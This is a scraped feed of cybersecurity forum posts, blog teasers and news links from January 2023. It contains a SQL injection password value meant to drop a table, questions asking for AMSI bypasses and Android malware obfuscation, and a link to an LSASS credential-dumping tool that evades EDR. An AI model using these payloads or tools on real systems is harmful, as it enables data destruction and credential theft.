    https://vaporwave.ivan.moe/list/ submitted by /u/Waste-Release-6235 [link] [comments]
    Advanced Data Analysis course from University of St. Andrews
    submitted by /u/dudewithoneleg [link] [comments]

    Rethinking CSMA (Cyber Security Mesh Architecture)
    1. Clarifying the concept: CSMA is one of the important strategic technology trends Gartner proposed last year; its full name is Cyber Security Mesh Architecture. For "matrix" there are two words in English: Grid and Mesh. Grid means that all elements in the matrix are of the same type, while Mesh carries a connotation of heterogeneity. So the reason CSMA uses Mesh is to mean "atomic security capabilities of different, heterogeneous types, organically linked and coordinated to form a security mesh". Look at Gar
    Cloud and Trust: The Battlefield of Future Security
    Endogenous security is a philosophical summary and exposition by Chinese scientist Academician Wu Jiangxing (邬江兴) on the current state of cyberspace security, comprising two parts: endogenous security problems and endogenous security systems and mechanisms.

    SecWiki News 2023-01-23 Review
    No news updated today~ For more of the latest articles, visit SecWiki

    Answers to Unit 42 Wireshark Quiz, January 2023
    The January 2023 Wireshark quiz analyzes a pcap of network traffic from an Agent Tesla-style infection. This post details the answers. The post Answers to Unit 42 Wireshark Quiz, January 2023 appeared first on Unit 42.

    The problem with Smbmap
    When using Smbmap in your Red Team engagement, keep in mind that Smbmap creates a random directory at the root of each SMB share to check… Continue reading on Medium »

    Grand Theft Auto V exploit assigned CVE number due to partial RCE
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24059 Comments URL: https://news.ycombinator.com/item?id=34484784 Points: 59 # Comments: 38


    What is a career in cybersecurity like in the UK and how financially rewarding is it?
    Hi, I recently saw an increase in demand for cybersecurity at the job centre. Is it true that there is a shortage in this industry? What is the cybersecurity career path like in the UK, and is it really financially rewarding? How is the stress? Thanks. submitted by /u/fanduz [link] [comments]
    How to secure firmware?
    Firmware is a good place for malware to hide: firmware resides in obscure places, under the radar of most people (it’s hard to see where it even exists); operating systems have no control over the firmware and the caves in which it resides; a lot of the time the firmware is old and doesn’t receive updates (if it does, repositories are not clear); it’s often closed-source and a proprietary blob; firmware survives OS reinstallation. How do you find the list of devices with firmware, verify the authenticity of the firmware software installed, and make sure there is no malware or rootkit hidden anywhere in there? How difficult is it to install malware in firmware without physical access? submitted by /u/chaplin2 [link] [comments]
    Why don't more security folks discuss other dangers of storing passwords in plaintext, such as second-order injections? Never understood that
    Like, everywhere you see people freaking out about passwords being stored in plaintext, but there are other implications of the password column in an SQL table being plaintext that hashing would have saved them from. One major example is second-order injections: things like second-order stored XSS or second-order SQL injection. The way these work is you would go to a /sign up endpoint and place an SQL statement in the password field, basically signing up with the password ROBERT'); --DROP TABLE Students;--. Typically it would immediately break the site upon sign up, but most sign-up forms are sanitized, so it saves them temporarily; however, if we go to, say, an /updateprofile endpoint and the password is used in a SELECT statement unsanitized, the tables would drop at this point. The key here is consistency, and devs could easily make an off-by-one error and forget to escape one endpoint/page; that's all it takes for a second-order injection to pop up. I'm more surprised people just care about the passwords themselves being the issue and not the entire site's integrity; there's barely any discussion on this. submitted by /u/TheCrazyAcademic [link] [comments]
    A drowning, solitary security engineer seeking help
    Hi /r/AskNetsec, I'm the lone security engineer at an 800 person organization and I'm feeling overwhelmed. Here are my high level responsibilities: Security architecture and engineering. Building and improving our SIEM (no time to monitor, investigate, and close alerts), implementing recommendations to harden our cloud environment, proposing and implementing new configurations (like DLP and MDM) Compliance. SOC compliance, GDPR, CCPA, contracts, policy, third-party questionnaires, security and awareness training Identity and access management. Creating and updating conditional access, improving/troubleshooting MFA, secrets management, privileged identity management Vulnerability management. Remediating vulnerabilities on our endpoints and in the cloud, patching workstations, inspecti…
    How to know more about modern web applications
    Hi, sometimes, while playing with some box on HTB, I realize that I have very little knowledge of modern web apps built with Node, JS, Angular, and so on. While it is a bit off topic, can anyone recommend a good starting point to approach these technologies? YouTube channels, Udemy courses, whatever. Thank you! submitted by /u/g-simon [link] [comments]
    When attackers gain access to a website, what prevents them from starting storing users passwords in plain text?
    I am very unfamiliar with security, especially with web servers, but I was wondering this: in the period between when attackers gain access and when their presence is discovered, are they able to start storing passwords/credit card details in plaintext somewhere outside the server? I guess they technically could, but more specifically, would that quickly become very obvious to the administrators? submitted by /u/SteveSonOfJobs [link] [comments]
    Best AMSI bypass to run malicious scripts on windows?
    Hi, my OSCP course requires running a variety of scripts that contain AMSI-triggering code like powercat. So I have searched for various AMSI bypasses and found quite a few. I am now wondering, is there a preferred way in this community to run such scripts that is the safest, or better with regard to other unknown issues? submitted by /u/DerekFoReal777 [link] [comments]
    Frustrated PenTester
    Let's face it, pentesting is not as interesting as we thought when we heard about it for the first time. I remember when I had more free time I was able to learn more each day, rather than by doing CTFs or reading writeups. However, diving into work, especially when you spend a lot of your time in meetings or doing reports (paperwork) and also doing general sec stuff (if you're working in a small firm), you will feel that you're losing your touch and missing a lot. I felt that when I was recently assigned to deliver a revShell during a social engineering assessment: defenses are becoming much smarter, and the open source tools I've used earlier are not working like before (even with code editing). It literally means that sometimes you have to write your own custom tools, which is not easy, especially if you're not proficient with multiple programming languages (Python, for me). I think I need some sort of new training only on evasion, but I can't decide which programming language to pick ATM (thinking of C# instead of Python). Have you ever been in a similar position? submitted by /u/sicKurity [link] [comments]

    Web Application Vulnerabilities - Bug Bounty Hunters (Beginners) Must Know
    What Are Web Application Vulnerabilities? Continue reading on Medium »
    Bypass Facebook locked profiles Post/Information
    Hello people Continue reading on Medium »
    Handy Tools for Beginner Bug Bounty Hunters
    As a novice bug bounty hunter or beginner level ethical hacker, it can be overwhelming to navigate the vast landscape of tools available… Continue reading on Medium »
    HTTP Request Smuggling — Basic CL.TE vulnerability
    Portswigger HTTP Request Smuggling Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Simple Web Challenge on HTB | Templated
    Hey folks, here is a simple web challenge for you… Continue reading on Medium »
    How I was able to get a critical bug on Google by getting full access on [Google Cloud BI Hackathon]
    Hello Hunters, Hello Infosec Community Continue reading on Medium »
    Blog 07: Misc — JSON Web Token(JWT)
    Hey folks! Continue reading on Medium »
    How to approach the target APIs?
    https://mega.nz/file/ReYzXISb#eZYb7pbTzY9N5D6kzOSYR5IBWg6oliRGyqwguIeGZbs Continue reading on Medium »
    How I found XSS on Admin Page without login!
    Introduction Continue reading on Medium »
    Forget SQL Injection, Have you Heard of JWT Injections?
    JSON Web Tokens (JWT) are a popular method for authenticating and authorizing users in web applications. However, as with any technology… Continue reading on Medium »
    What is cross-site scripting (XSS)? Web App Pen-testing
    Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users… Continue reading on Medium »

    Comparative fuzzing parallel Rust tools
    I previously wrote about how we can use Rust’s “fearless concurrency”, resulting in a tool called ripunzip. (Here are some performance… Continue reading on Medium »
    The Problem with Open Source Software Security
    Reporting vulnerabilities in open-source software is a nightmare. How can we make it better? Continue reading on Medium »

    What's the policy on posting open government or international government directories?
    Like stuff that is presumably supposed to be confidential, i.e. court case docs submitted by /u/dudewithoneleg [link] [comments]

    This Week in Open Source – DNEG's new tool, Kernel vulnerability, Debian 12
    Article URL: https://fossweekly.beehiiv.com/p/foss-weekly-32-kde-plasma-5-27-kernel-vulnerability-dneg-s-tool-and-more Comments URL: https://news.ycombinator.com/item?id=34481703 Points: 1 # Comments: 0

    Unlocking ChatGPT: Advanced AI for Google Dorking & OSINT
    I’m sure you know, Security testers and investigators use Dorking (Google Hacking) to find sensitive information stored on websites… Continue reading on Medium »
    SPY NEWS: 2023 — Week 3
    Summary of the espionage-related news stories for the Week 3 (January 15–21) of 2023. Continue reading on Medium »

    Autopsy: Make Call log readable from output
    How can I convert/translate this call log to numbers I as a human can read? I extracted the data using adb and now I am looking at it in Autopsy, but it doesn't make it readable. Like what are the real phone numbers? For example: -incoming1-0:1672517017901074%e609af1cf9fd7ecdið·™; ¢ -incoming1-0:1672519798593364%e609af1cf9fd7ecdUÆ…e; £ -incoming1-0:1672520180877682%e609af1cf9fd7ecdG$N; ¤ -incoming1-0:1672520194778510%e609af1cf9fd7ecdD¸Ês; ¥ -incoming1-0:1672520243018075%e609af1cf9fd7ecdðÿq ¦ I think the other thing I can do is load a .json file to translate, but I can't figure out how to do it. HELP PLEASE? submitted by /u/WATERSLYDPARADE [link] [comments]

    Reflected XSS Leads to $3,000 Bug Bounty Rewards from Microsoft Forms
    No content preview
    HTTP Request Smuggling — Basic CL.TE vulnerability
    No content preview
    Blockchain Security Best Practices: How to Secure Your Transactions in a Decentralized World
    No content preview

    CVE-2020-36109 POC - ASUS routers stack overflow
    submitted by /u/NoPaleontologist7419 [link] [comments]
    CVE-2021-20294 POC - readelf stack overflow
    submitted by /u/NoPaleontologist7419 [link] [comments]
    (In)Security of the "Pass" password manager
    submitted by /u/Gallus [link] [comments]
    Studying Conformance of MANRS Members (routing security)
    submitted by /u/danyork [link] [comments]
    Git repository of Linux forensic/monitoring scripts (small side project for implementing ideas and testing stuff I read somewhere)
    submitted by /u/sqall01 [link] [comments]
    Using a service with markdown capabilities? Good chance it's vulnerable and attackers can easily take it down
    submitted by /u/roy_6472 [link] [comments]

    Getting User’s NTLMv2 hash through LLMNR/NBT-NS Poisoning
    I will walk you through step-by-step guide to get user’s NTLMv2 hash using LLMNR/NBT-NS Poisoning and cracking it using John the Ripper. Continue reading on Medium »

    SecWiki News 2023-01-22 Review
    No news has been posted today~ For more of the latest articles, please visit SecWiki

    Apache HTTPD Changes for 2.4.55 including CVE-2022-37436 for mod_proxy
    Article URL: https://downloads.apache.org/httpd/CHANGES_2.4.55 Comments URL: https://news.ycombinator.com/item?id=34478456 Points: 2 # Comments: 0

    How I found XSS on Admin Page without login!
    Introduction Continue reading on Medium »


    What’s the point of using encrypted cloud storage if the OS can access local files anyway?
    I’m looking for a new privacy-focused cloud storage service that deploys zero knowledge end-to-end encryption. I must say that I’m having a hard time understanding the terms and technology behind cloud and encryption stuff, though I’m still curious and would like to learn more. While reading about the pros and cons of encrypted cloud services, a question came to mind regarding the effectiveness and purpose of encrypting files: I use Windows 10 as my main OS; I store all my data locally on the PC, as well as having an automatically synced (identical) copy in the cloud. Now let’s say that I open a document locally, edit it, save, then upload (sync) to an encrypted cloud service (alternatively, encrypt via Cryptomator and upload to whichever cloud service). I understand that the file that I just worked on and uploaded to the cloud service is now “safe” provided that the cloud provider uses zero knowledge E2EE. However, I viewed and edited the file in Windows 10 in an unencrypted state. Does this mean that Windows / Microsoft did have full access to the file and can send or sell data and information about the content of the file regardless of the encryption that happened afterwards? If that’s the case, then how can I benefit from encrypted cloud storage / encryption software (like Cryptomator) if the operating system is going to have full access to the local *unencrypted* files anyway? Especially when my Microsoft account is associated with both my Windows copy and MS Office apps – honestly it is just literally thoroughly integrated in the OS. Please correct me where you see fit as I hate to be paranoid, but at this moment I can’t seem to understand how to safely store / sync files both locally & in the cloud. Thank you submitted by /u/Xhuzestaan [link] [comments]
    Does phone number verification on ProtonMail get passed on to link you to your OSINT results?
    I was wondering if that inevitably gets passed on and subsequently linked to your other accounts in OSINT or other similar resources or if ProtonMail actually follows through when they say, "Your phone number will only be used for this one-time verification." submitted by /u/evanator5600 [link] [comments]
    What Type Of Hypervisor Should I Use For Creating Secure Sandbox Environment?
    Hello everyone, I am interested in setting up a home lab with the goal of creating a secure sandbox environment. I want to use it as a safe platform for learning more about malware analysis, reverse engineering, and threat intelligence on the Dark Web. I'm hoping developing these skills will help me land a job with a focus in those general areas. With that in mind, would a Type I or Type II hypervisor provide me the most flexible, secure, and easiest setup? I would imagine a Type I would be easier to set up, but a Type II would be more secure and provide more flexible options. Would having access to a non-virtualized OS provide me any additional benefits in the malware analysis/reverse engineering process? I'd also welcome any general recommendations or security best practices for creating a sandbox to play with malware. Thanks! submitted by /u/matthewob5 [link] [comments]
    Guidelines for secure implementation of third-party software?
    I am looking into standards/guidelines that can outline the requirements to address secure implementation of third-party black-box software apps on an internal server. I know there should be something but cannot find anything about it. There is a lot written on SDLC but not so much on off-the-shelf software. submitted by /u/elkindus [link] [comments]
    Does Apple not allow Windows users to export their iCloud passwords?
    I was trying all day to figure out how to export my iCloud passwords to Bitwarden, to no avail. I have an iPhone & a PC. It would be typical of Apple if there was no way to do this. This is actually exactly why I converted to Bitwarden and Google Photos. I can't trust that Apple will give me full control of my data. submitted by /u/SteveSonOfJobs [link] [comments]
    Learn Android malware obfuscation and ways to get remote access to any Android.
    Hi guys, I want to learn about red team stuff related to Android hacking. I want to know how to obfuscate the malware for getting Android access, learn Android malware obfuscation, and are there any other ways to get remote access to Android other than an APK? I have tried L3mon and TheFATRAT but either the app gets detected or gets uninstalled. It would be great if you guys share some useful resource or guide me on getting into the Android device. submitted by /u/geeky_gopher [link] [comments]

    “Advanced SQL Injection Techniques” How to Bypass Login Forms and Extract Sensitive Data
    SQL Injection is a common method used by hackers to gain unauthorized access to a database and extract sensitive information. One of the… Continue reading on Medium »
    The Top 10 Most Common Vulnerabilities Found in Bug Bounty Programs
    As a bug bounty hunter, it is important to be familiar with the most common vulnerabilities that are found in bug bounty programs. By… Continue reading on Medium »
    Inside the Mind of a Bug Bounty Hunter Interview with a Successful Hacker
    As a bug bounty hunter, the process of finding and reporting vulnerabilities in software can be both challenging and rewarding. To better… Continue reading on Medium »
    How to Effectively Utilize Burp Suite for Bug Bounty Hunting
    Burp Suite is a powerful tool that is widely used by bug bounty hunters to find vulnerabilities in web applications. It is a collection of… Continue reading on Medium »
    Bug Bounty Hunting for Non-Technical Individuals: How to Get Started
    Bug bounty hunting is a process of finding and reporting vulnerabilities in software and receiving a reward for doing so. It has become a… Continue reading on Medium »
    “The Psychology of Bug Bounty Hunting” Understanding the Mindset of Successful Hunters
    Bug bounty hunting is a challenging and rewarding field that requires a unique combination of technical skills and a specific mindset… Continue reading on Medium »
    “Bug Bounty Hunting on the Darkweb” Uncovering Vulnerabilities in Hidden Networks
    Bug bounty hunting on the darkweb can be a challenging and rewarding endeavor for experienced security researchers. Continue reading on Medium »
    “Bug Bounty Hunting as a Career” Opportunities and Growth Potential
    Bug bounty hunting is a rapidly growing field that offers a wide range of career opportunities and growth potential. A bug bounty hunter… Continue reading on Medium »
    “The Art of Chaining” How to Chain Multiple Vulnerabilities for Maximum Impact
    As a bug bounty hunter, one of the most effective ways to find and exploit vulnerabilities is through the art of chaining. Chaining is the… Continue reading on Medium »
    CSRF + Stored XSS to Leading to Full Account Takeover
    This write-up is about my findings of CSRF + XSS and using them both to get a full account takeover. Wish you like it ❤ Continue reading on Medium »
    Privilege Escalation Attacks
    Attacks known as privilege escalation attempt to gain increased access to important systems, applications, and networks by taking… Continue reading on Medium »

    Collection of TV remotes
    submitted by /u/themariocrafter [link] [comments]
    OD of academic papers, books on finance & ML (+ some WP assets; English & Korean)
    submitted by /u/1bir [link] [comments]
    French OD of movies
    submitted by /u/Rana_Thisara [link] [comments]
    Windows 93 SkyNet assets (image, midi, js)
    https://pierrepapierciseaux.net/.skynet/img/ - images for Windows 93 SkyNet https://pierrepapierciseaux.net/.skynet/midi/ - ditto for MIDI https://pierrepapierciseaux.net/.skynet/js/ - ditto for JS submitted by /u/themariocrafter [link] [comments]
    More OD’s with old iOS apps, as my first one was a success
    http://www.salixa.com/trh/ios/IPAs/ipa/ http://s1.bitdl.ir/Software/ http://te.censoft.com/download/ https://files.zmodo.com/ http://mikerichardson.name/ https://marcoalima.com/ https://dl.ievo.top https://doc.downloadha.com/Mehran http://schwart6.home.xs4all.nl/smartview2/ submitted by /u/themariocrafter [link] [comments]

    Researchers release PoC for iTLB-multihit bug affecting Intel cpus (crashes host from guest in most hypervisors).
    submitted by /u/Ch0pdr0p [link] [comments]
    Somnium: Script to test netsec detection capabilities.
    submitted by /u/Th4ray [link] [comments]
    U-Boot – Unchecked Download Size and Direction in USB DFU (CVE-2022-2347)
    submitted by /u/Gallus [link] [comments]
    libgit2 fails to verify SSH keys by default
    submitted by /u/bascule [link] [comments]

    Nest (HTB)
    This is part of the HTB track under the name of Intro to Dante Continue reading on Medium »
    Red Team Series : Introduction to red teaming
    What is red teaming? Continue reading on Medium »

    SecWiki News 2023-01-21 Review
    No news has been posted today~ For more of the latest articles, please visit SecWiki

    Uncovering the Digital Trail: An Open-Source Guide to Investigating Social Media Photos
    Social media has become a crucial tool for law enforcement and other investigators in uncovering evidence and solving crimes. Continue reading on Medium »
    So What is a Hacker Anyways?
    A look at black hats, white hats and everything in between. Continue reading on Medium »


    The SSL Certificate Issuer Field is a Lie
    submitted by /u/self [link] [comments]
    CVE-2022-25637 - Multiple TOCTOU vulns in peripheral devices (Razer, EVGA, MSI, AMI)
    submitted by /u/jat0369 [link] [comments]
    Abusing Adopted Authority on IBM i
    submitted by /u/buherator [link] [comments]
    Building a io_uring based network scanner in Rust
    submitted by /u/Gallus [link] [comments]
    How to completely own an airline in 3 easy steps
    submitted by /u/_vavkamil_ [link] [comments]

    Arbitrarily encoding data in Ping types in a sequence?
    Is a complex and meaningful arrangement of bits ever made into rules and drawn from the size and frequency of pings received? Could it be? I had the thought that one could specify arbitrary rules for using a certain ping size and frequency to represent bits of text or whatever else. Example: 30-50 bytes = 0, 1-200 bytes = 1; or: 5-10 pings per second = 0, 1-4 pings per second = 1. Obviously not ideal, but given that ping is often easier to send and receive to untrusted devices without configuring things, and is sometimes not blocked by firewalls, is this ever done? What about messages that are simple, like turning on a light within a network? I suppose you would have to have software that automatically translated the data into a long script of different sized and speeded pings to be sent separately in a row, and have redundancy for lost packets. submitted by /u/Loquzofaricoalaphar [link] [comments]
    How important is password Authentication - SSH?
    I hear mixed opinions on disallowing password authentication, but my understanding is limited. Is password Auth an additional security measure or a means of establishing ssh without a key-pair exchange? Should ssh password authentication be avoided? I'm familiar with "permitRootLogin no" as being good practice. Thanks in advance! submitted by /u/pLeThOrAx [link] [comments]
    What is Zero-Trust outside of the marketing bs?
    Hi all, searched the sub, have scoured the internet, I believe due to its buzzword use the real meaning has been blown out. From my understanding it means that no one actually has real access to live data and everyone must use an encryption key to access said data. Can someone ELI5? submitted by /u/cfvhbvcv [link] [comments]
    Can authenticated internet-facing web app be discovered if not indexed by search engines?
    Can an internet-facing web app behind an OAuth-redirect login get discovered in the wild if it's not indexed by any search engines? E.g. if something automated is scanning for vulnerabilities, can it eventually stumble on said web app amongst millions of random ones? Or can it only be discovered by someone targeting it explicitly, e.g. enumerated subdomains of a top-level domain and found something tempting? I would assume the latter. The other possibility is of course someone internal who knows the address. We have such a web app and the WAF picked up a probe for WAF SQL injection vulnerabilities on its custom domain. I'm trying to work out if this is a random scan (don't need to think about it for now) vs. getting specifically targeted (do need to think about it more). Thanks! submitted by /u/l00lighters [link] [comments]
    BSIMM Questions
    I'm trying to use the BSIMM but I can't find any document that explains all of the activities in BSIMM. I want a list or a spreadsheet or something that just describes in a single document what the BSIMM framework contains. If you go to the download link on their website, it keeps redirecting me to some report by Synopsys? submitted by /u/Soggy_Bag_8745 [link] [comments]
    YouTube vs. Reality
    I've been seeing a lot of cyber security videos claiming that you can get a 6 figure job with no college degree, no experience, no boot camps, no certs, and no problem. They claim specifically for the vulnerable scanner operator, security analyst, and a compliance auditor. I have to say all of this sounds too good to be true. I've been searching online to see the reality (pros and cons) of these positions but fail to find legitimate resources. I want to know what it is like working in these positions day to day, pros and cons. submitted by /u/Virtual_Decision9209 [link] [comments]
    How do I customize my GitHub like this? I am new to GitHub and want a similar look for my repos
    I have been following this researcher for a few weeks and love the look of their profile. Is there an easy way to mimic it? submitted by /u/_billybud_2 [link] [comments]

    Sliver C2 Leveraged by Many Threat Actors
    submitted by /u/dmchell [link] [comments]
    Smbmap creates directory to check write privileges on SMB Share
    When using Smbmap in your Red Team engagement, keep in mind that Smbmap creates a random directory at the root of each SMB Share to check for write privileges, which makes it less stealthy :0 It deletes that directory afterwards (when no exception is thrown). But the Blue Team can still detect it by listening for file creation events at the root directory of every share. The name of the directory is by default 10 characters long and consists of only uppercase letters. So this regex should detect it: ^[A-Z]{10}$ Relevant Method -> https://github.com/ShawnDEvans/smbmap/blob/a771476977cee1b96108b3d0122330cd5fe50819/smbmap.py#L779 Random directory name (if you want to patch it) -> https://github.com/ShawnDEvans/smbmap/blob/a771476977cee1b96108b3d0122330cd5fe50819/smbmap.py#L47 submitted by /u/JustAnotherRedTeamer [link] [comments]
    Dumping LSASS by CrowdStrike Falcon and Windows Defender
    I was able to dump LSASS with DumpThatLSASS from D1rkMtr successfully with Windows Defender and CrowdStrike Falcon enabled. The EDR tools detect the behavior of the LSASS dump but don't stop the process. This was really interesting behavior for a compiled application. https://youtu.be/3nxjPkxGDWo https://github.com/D1rkMtr/DumpThatLSASS submitted by /u/Infosecsamurai [link] [comments]
    Good UAL (Universal Audit Log) Hunting
    submitted by /u/SCI_Rusher [link] [comments]
    Azure Attack Paths Management
    submitted by /u/sofblocks [link] [comments]

    Jump Lists
    Greetings all, I’m attempting to create a timeline of events in a case and had a question regarding jump list files. Is it possible for the OS (Windows 10) to modify the Last Accessed date/time of a jump list file without user input? It appears that Windows Explorer accessed a local folder at the following location - “C:\ProgramData[App Name]\…” via jump list and I want to confirm if it was user or OS generated. It should be noted the application appears to be an online-based subscription application. Thanks in advance for your help! submitted by /u/Plastic-Mud-868 [link] [comments]
    Autopsy
    I'm exporting all PDFs and office files from an image. When exporting, it adds a number before the original file name, I assume because of duplicate names. When I save the table, the number doesn't appear in the CSV. Is there a way to add it to the table? My goal is to create a load file but I'm having trouble matching the original file name. submitted by /u/theedon323 [link] [comments]
    Magnet and Grayshift acquired by private firm, Magnet now a private company
    submitted by /u/copswithguns [link] [comments]
    FTK Imager trying to find evidence of email harvesting
    I am trying to analyse a .E01 file using FTK Imager 4.5.0.3 and am looking for evidence of email harvesting used for spamming unsuspected people to subscribe to illegal IPTV streaming services. I am new to this and have no idea; any help will be appreciated. submitted by /u/yogiblack590 [link] [comments]
    unique identifiers in word .docx documents?
    Are there any decent UIDs in the XML metadata embedded in .docx documents that would tie a document to the installation of Word that created it? I can't spot any obvious ones but I don't do this too often. I've used 'creator' before when it was quite specific ('Rupert Q Specialname') - but I've got a bunch of documents that I know were made by the same person - and I need an easy way of spotting future ones also made by the same person. Unfortunately the 'creator' on these ones is just 'john' and that's not specific enough for my needs. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]
    Python Modules in Autopsy
    Hello, I am having issues with Python modules in Autopsy. I tried a few and none show up in the ingest menu. I got one to show up but it didn't want to run. Anyone had similar issues and fixed it? All the modules I tried that did not work are only a single .py file. The one that showed up has a few files besides the .py file. I've got Python 2.7 and 3.11 installed. OS is Windows. Autopsy version is 4.19.3 submitted by /u/Iaitoo [link] [comments]
    Criminal Justice Bachelor’s with Digital Forensic Master’s?
    Hey guys! First post here, and I have a quick question. I am currently a 1st year undergrad studying Criminal Justice. My original plan was to go the FBI/DEA/HS route, but recently I’ve started to consider computer forensics careers a lot more. Would it be advisable to finish my CJ degree and get a masters in digital forensics or would it be better to stop my CJ degree and swap to a CS degree if I decide to pursue the DF route? Thanks for any advice! submitted by /u/DuskyBacchus [link] [comments]

    Creating your own tools to hunt bugs, a power often neglected
    Creating your own tools based on the needs encountered while hunting bugs is often a power that is overlooked… Continue reading on InfoSec Write-ups »
    Basic SSTI — Server-Side Template Injection | 2023
    Portswigger — Basic server-side template injection Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Bug Zero at a Glance [Week 14 - 20 January]
    What Happened with Bug Zero? Continue reading on Bug Zero »
    Two Factor Authentication Bypass On Facebook
    Summary: I discovered the lack of rate-limiting issue in Instagram which could have allowed an attacker to bypass two factor… Continue reading on Pentester Nepal »
    Password Cracking Technique used by Blackhat Hackers
    What is Bruteforce? Continue reading on Medium »
    Tryhackme: Easy Peasy
    Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate… Continue reading on Medium »

    Buffer Overflow [Vulnserver]
    Buffers are memory storage regions that temporarily hold data while it is being transferred from one location to another. Continue reading on Medium »
    Home Grown Red Team: Bypassing Applocker, UAC and Getting Administrative Persistence
    Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. Continue reading on Medium »

    On the Vulnerability of Backdoor Defenses for Federated Learning
    Article URL: https://arxiv.org/abs/2301.08170 Comments URL: https://news.ycombinator.com/item?id=34457721 Points: 1 # Comments: 1
    GitHub introduces CodeQL, a new tool for automated code review and vulnerability
    Article URL: https://github.com/github/codeql Comments URL: https://news.ycombinator.com/item?id=34452685 Points: 4 # Comments: 0

    SecWiki News 2023-01-20 Review
    No news has been posted today~ For more of the latest articles, please visit SecWiki

    Tons of old iOS apps
    submitted by /u/themariocrafter [link] [comments]

    Common MD5 problems and bypasses
    MD5-related challenges come up often in CTFs, sometimes as a standalone problem, more often as one point within another challenge. Here I collect MD5-related knowledge and give challenges that involve each point. The types I have seen are the following; masters, please add more: 1. MD5 brute forcing 2. MD5 weak comparison
    DC series target machines | DC1
    From a CMS framework vulnerability to system command privilege escalation
    New Year event | Invite friends to win a free order, four gifts waiting for you
    The FreeBuf Knowledge Continent App New Year event is here~

    Unit 42 Wireshark Quiz, January 2023
    The January 2023 Wireshark quiz analyzes a pcap of network traffic from an Agent Tesla-style infection. The post Unit 42 Wireshark Quiz, January 2023 appeared first on Unit 42.

    Efficiently Running Penetration Testing Tools with Github Actions
    Using Github Actions as pentester and to run tools Continue reading on Medium »

    Keeping the Wolves Out of WolfSSL — Fuzzing Weekly CW3
    Vulnerabilities in cryptographic libraries found through modern fuzzing… Continue reading on Medium »
    Join the fuzzing community
    Fuzzing is increasingly more common, and exceptionally sophisticated at finding vulnerabilities at scale. Here are two online communities… Continue reading on Medium »

    Keeping the Wolves Out of WolfSSL – Fuzzing Weekly CW3
    Article URL: https://ioc.exchange/@FuzzingWeekly/109720989217652281 Comments URL: https://news.ycombinator.com/item?id=34451019 Points: 1 # Comments: 0

    XSS
    What is XSS? Continue reading on Medium »


    Carbon Black Defense or Microsoft Defender for Endpoints P1/P2?
    Currently in the organization I work for we are utilizing CB Defense and we are considering switching over to MS Defender. Now trying to find actual comparisons of these two/three (P2) products is very difficult since all comparisons are sales related. I want actual real world comparisons and the best I’ve found up to this point is this article. https://carbonblack.vmware.com/resource/vmwares-mitre-engenuity-attck%C2%AE-evaluations-delivers-unmatched-out-box-security-value What are all of your thoughts on P1/P2 in comparison to CB Defense? Please do not tell me about other Endpoint Security solutions. Just looking to get more insight on these. Appreciate any assistance with this decision. submitted by /u/ronni3 [link] [comments]
    A Minecraft server wants to take control of PC and install programs.
    https://twitter.com/JohnLzzGrinders/status/1616195715159543810 The tweet includes screenshots of the conversation with the moderator, saying he would have the "child" install a program to control their computer. Discord allows screensharing so it seems malicious these servers keep trying to do it, see my other post for info on the other server that did this same thing. So my question is, even though I pretty much already know the answer, this is not safe to allow right? submitted by /u/Azekial_khyber_gta [link] [comments]
    Are there any GRC / compliance SaaS solutions that are good and fully featured?
    I am looking for something to help with compliance, primarily for SOC 2 but also some other frameworks. I would like it to do automated cross mapping between frameworks for controls/evidence. Also looking for something that has good 3rd party vendor management, risk register, integrations for automated evidence collection and generally just has a good UI/UX. I feel like I have looked at everything out there that might work. Vanta, Drata, Tugboat, Rhapsody, Apptega, StandardFusion, Secureframe, Anecdotes, LogicGate. All of these products seem to be lacking in some way. Mostly around the vendor and risk management. The old school GRC platforms are just too clunky and missing cross-framework mapping and integrations. Is anyone using something that they really like and check all my boxes? submitted by /u/junkaccount1999 [link] [comments]
    Interested in teaching in the industry. Do universities care about bachelors degree GPA?
    I currently work at Meta as a Security Engineer. Because of some circumstances, I got a really low GPA during my bachelors (sub 2.5) but in my masters I did much better and got a 3.8 I mainly got my masters because I want to teach. For those with experiences around the teaching industry, how much will this matter in your opinion? submitted by /u/herbertisthefuture [link] [comments]
    On-prem vs cloud SIEM security risks
    Currently in an internal battle with the network and infrastructure guys about the best type of system for our network. They're of the mind to deploy a SIEM on-prem so that, in their minds, we're protected from the SIEM itself being breached, which is their concern with a cloud-based deployment. One of the SIEMs we'd reviewed is perfect but has read/write privileges with O365 for SOAR capabilities. This, in their minds, is antithetical to the type of system they had going in. Beyond the basics of cost, maintenance, and deployment ease of cloud, is there any extra ammo you can give me here to build my case? Thanks. submitted by /u/LittleRaskol9
    Are there any other interesting fault injection/manipulation attacks like bitsquatting that can be influenced remotely?
    So bitsquatting was a popular fault manipulation technique. I'm not gonna use the term fault injection, because you're not injecting any faults; you're just manipulating faults already happening to the hardware by crafting the right domains. The fault in this case is thermal residual energy that is known to cause bit flips in memory, and in this case it happens during the DNS resolution process. Are there any other interesting attacks like this? Bitsquatting was novel at the time and extremely hard to mitigate; the only protection was using ECC RAM, and even then I don't think error-correcting RAM mattered. submitted by /u/TheCrazyAcademic
    Does the Parquet data format have any interesting vulns like injection stuff?
    While layer 7 gets all the attention and popularity in the OSI model, a lot of interesting things happen at layer 6, the presentation layer, or what I like to call the data format layer. I like to explore various types of exotic, over-complex data formats because, as they say, complexity is the enemy of security. The general rule is that if a software's data formatting is too simple, like static HTML or JSON, it can't be exploited, but if it's too complex it can be exploited. Parquet seems to be a complex data format with a lot of moving parts, so I'm thinking that, like CSV, there are bugs like a "Parquet injection" if user input ever gets embedded into a Parquet file on the server backend, which I've seen rarely on a few bug hunting engagements, but I never really messed with Parquet interactions much. submitted by /u/TheCrazyAcademic
    A searchable database of the internet's SSL/TLS certificate names.
    CertDB is designed to uncover hidden, forgotten, or abandoned web assets. It can also be used to locate origin servers, detect phishing or fraudulent sites, and even find deleted DNS entries. You can conduct fast searches for keywords, site names, and IP addresses. Try it now and let us know what you think! app.w2s2.com/certdb submitted by /u/One_Opposite_5424
    Is reading The Web Application Hacker's Handbook 2 still worth it in 2023?
